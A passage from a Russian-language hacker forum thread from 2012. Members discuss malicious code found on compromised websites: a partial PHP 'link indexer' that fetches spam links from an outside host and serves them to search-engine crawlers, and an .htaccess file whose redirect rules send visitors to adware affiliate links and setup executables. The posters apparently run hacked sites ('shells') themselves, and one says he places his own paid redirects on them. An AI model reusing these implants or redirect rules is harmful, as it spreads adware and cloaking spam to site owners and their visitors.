COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]'&vs='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$vs[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'&temp='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$temp[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'&hu='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$conect[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'&ip='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"REMOTE_ADDR"[/COLOR][COLOR="#007700"]]); 

    

    

    if([/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"]or[/COLOR][COLOR="#0000BB"]$MERS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'utf-8'[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$TMP[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mb_convert_encoding[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$TMP[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'windows-1251'[/COLOR][COLOR="#007700"]);

    }

    echo[/COLOR][COLOR="#0000BB"]$TMP[/COLOR][COLOR="#007700"];

    }

}

[/COLOR][COLOR="#0000BB"]get_asp[/COLOR][COLOR="#007700"]();[/COLOR][/COLOR]

13.09.2012, 10:26

DJ4J

Познающий

Регистрация: 23.08.2009

Сообщений: 93

Провел на форуме:
1639209

Репутация: 71

Код не полный.Это само по себе ничего не сделает.Скорее всего этот файл инклудится из другого файла, а уже тот выполняется.

13.09.2012, 15:21

Chrome~

Постоянный

Регистрация: 13.12.2008

Сообщений: 354

Провел на форуме:
1747641

Репутация: 175

Это код индексатора. Получает ссылки с некого http://podstava.ws/ и выводит их поисковым роботам. Но код неполный.

13.09.2012, 15:33

sova1611

Новичок

Регистрация: 10.01.2009

Сообщений: 0

Провел на форуме:
9138

Репутация: 0

да подтверждаю это скрипт индексатора,даже знаю чей)но не скажу)))))

13.09.2012, 18:45

DJ4J

Познающий

Регистрация: 23.08.2009

Сообщений: 93

Провел на форуме:
1639209

Репутация: 71

Цитата:

Сообщение от Chrome~

Это код индексатора. Получает ссылки с некого http://podstava.ws/ и выводит их поисковым роботам. Но код неполный.

Как ты определил, откуда выводит?

//уже понял

18.09.2012, 13:20

spiderbuber

Познающий

Регистрация: 20.10.2010

Сообщений: 61

Провел на форуме:
19136

Репутация: 0

Сегодня снова был немного удивлен

С индексатором определились, разобрались

Сегодня снова был немного удивлен. Уже на другом шелле нашел в htaccess такое:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]RewriteRule[/COLOR][COLOR="#007700"]^[/COLOR][COLOR="#0000BB"]free[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]download[/COLOR][COLOR="#007700"](/?)+$   /[/COLOR][COLOR="#0000BB"]ad[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]dl[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]L[/COLOR][COLOR="#007700"]]

[/COLOR][COLOR="#FF8000"]# RewriteRule ^trafback(/?)+$    http://network.adsmarket.com/click/i2ZrmWKcqZaOaW2aX8p6w4iQbJ5mnH2ZiZBwlmCjqZeLZnCWjZ17m4xlag [L]

[/COLOR][COLOR="#0000BB"]Redirect[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ilivid http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//network.adsmarket.com/click/i2ZrmWKcqZaOaW2aX8p6w4iQbJ5mnH2ZiZBwlmCjqZeLZnCWjZ17m4xlag

[/COLOR][COLOR="#0000BB"]Redirect[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]mp3wmaconverter http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//network.adsmarket.com/click/i2ZrmWKcqZaOaW2aX8p6w4iQbpxnm36biZBwlmCjqZiNZWqWjZ56l4xoag

[/COLOR][COLOR="#0000BB"]Redirect[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]gimp http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//network.adsmarket.com/click/i2ZrmWKcqZaOaW2aX8p6w4iQb51inX6YiZBum2Kcg8OManCZX8p9mI9maZY

[/COLOR][COLOR="#0000BB"]Redirect[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]emule http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//network.adsmarket.com/click/i2ZrmWKcqZaOaW2aX8p6w4iQbJdem4KViZBum2Kcg8OLYW-XX8p7nIhjbZY

[/COLOR][COLOR="#0000BB"]RewriteRule[/COLOR][COLOR="#007700"]^[/COLOR][COLOR="#0000BB"]matlnk[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]exe[/COLOR][COLOR="#007700"](.*)+$[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//network.adsmarket.com/click/i2ZrmWKcqZaOaW2aX8p6w4iQbZtnoHyZiZBum2Kcg8OLaG-bX8p8mIxqcpY [L]

# RewriteRule ^hotnews(/?)+$    /ad/directadvert.html [L]

# Redirect /gaco/     http://gameconvert.net/install.php?rid=111&name=

# RewriteRule ^dlfile/(.*)+$   /ad/setup_download.exe [L]

# Редирект с подменой/files

[/COLOR][COLOR="#0000BB"]Redirect[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]lomo[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//loadmoney.ru/get_file?sid=2058&url=

[/COLOR][COLOR="#0000BB"]RewriteRule[/COLOR][COLOR="#007700"]^[/COLOR][COLOR="#0000BB"]m_lomo[/COLOR][COLOR="#007700"]/(.*)+$   /[/COLOR][COLOR="#0000BB"]go[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]download_setup[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]exe[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]L[/COLOR][COLOR="#007700"]]

[/COLOR][COLOR="#FF8000"]# Redirect /download/    /esc.php?name=

[/COLOR][COLOR="#0000BB"]Redirect[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]get[/COLOR][COLOR="#007700"]/     /[/COLOR][COLOR="#0000BB"]load[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]q[/COLOR][COLOR="#007700"]=

[/COLOR][COLOR="#FF8000"]# Redirect /goto/     /load.php?q=

# RewriteRule ^dldla/(.*)+$    /go/esc_downloader.exe [L][/COLOR][/COLOR]

Про ПП gameconvert.net и loadmoney.ru слышал, но вот что за network.adsmarket.com ?

Стало любопытно, пошел по папкам.. Слил весь левак .

Что вообще делают эти коды?

Также что интерессно, на сайте висят несколько картинок-плееров с ссылками на визитвеб.

Неужели визитвеб принимает траф по прямой ссылке, а не по тизерам?

Также под файлообменниками добавляется ссылка на скачку (я обычно ставлю туда слив на платник), но тут после нескольких редиректов нам предлагается скачать некое ПО:

http://a.ficklebox.com/IC/GPLAppBundler82/40210/1/b79a1917-e5a7-46e1-b7bc-751af3ae1cac/eMuleSetup.exe

Которое каспер определяет как:

Цитата:

Сообщение от None

содержит легальное ПО, которое может быть использовано злоумышленником для нанесения вреда компьютеру или данным пользователя not-a-virus:AdWare.Win32.ScreenSaver.e

Что это ЗА?

ЗЫ: Может кто признается, чьё творение (чирканите в аську)?

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход